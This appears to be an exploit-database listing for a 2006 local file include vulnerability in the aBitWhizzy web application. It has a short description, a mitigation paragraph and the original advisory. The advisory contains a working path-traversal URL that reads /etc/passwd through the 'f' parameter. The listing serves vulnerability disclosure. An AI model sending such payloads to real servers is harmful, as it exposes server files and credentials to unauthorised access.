header-logo
Suggest Exploit
vendor:
aBitWhizzy
by:
Laurent Gaffié & Benjamin Mossé
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: aBitWhizzy
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

aBitWhizzy [local file include]

aBitWhizzy is a web application developed by Unverse.net. It is vulnerable to a Local File Include vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. This can allow the attacker to include a local file on the server, such as the /etc/passwd file. This can lead to the disclosure of sensitive information.

Mitigation:

The application should be configured to only allow the inclusion of files from a limited set of directories. Additionally, the application should be configured to only allow the inclusion of files with specific extensions.
Source

Exploit-DB raw data:

aBitWhizzy [local file include]
vendor site: http://www.unverse.net/abitwhizzy/
product : aBitWhizzy 
bug:local file include
global risk : high


http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-21]

Navigation

Suggest Exploit

Services By CQR